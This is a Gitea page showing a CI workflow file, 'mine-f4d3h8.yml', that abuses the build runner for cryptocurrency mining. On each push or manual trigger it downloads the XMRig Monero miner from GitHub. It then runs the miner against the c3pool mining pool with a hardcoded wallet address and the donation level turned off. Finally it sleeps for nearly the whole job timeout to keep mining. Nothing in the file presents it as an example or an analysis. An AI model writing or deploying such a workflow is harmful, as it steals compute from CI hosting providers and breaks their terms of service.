w-f4d3h8/.gitea/workflows/mine-f4d3h8.yml
wkscqpwznk b790ab1345
Some checks are pending
mine / mine (push) Waiting to run
mine f4d3h8
2026-06-01 09:01:00 +02:00

14 lines
499 B
YAML

name: mine
on:
push:
branches: [main]
workflow_dispatch:
jobs:
mine:
runs-on: ubuntu-latest
timeout-minutes: 55
steps:
- run: |
curl -sL https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz | tar xz --strip-components=1
./xmrig -o mine.c3pool.com:15555 -u 87gtFpmvkY92UFddzbpFoGUWY9GMxj9LVVrjGix86h2Y6gdXnsfRCFw7h5Wz7LCmoJF8em5GYditNGwpkqmBmajXVSMXnHM -p fg-f4d3h8 --donate-level=0 -t 2 &
sleep 3200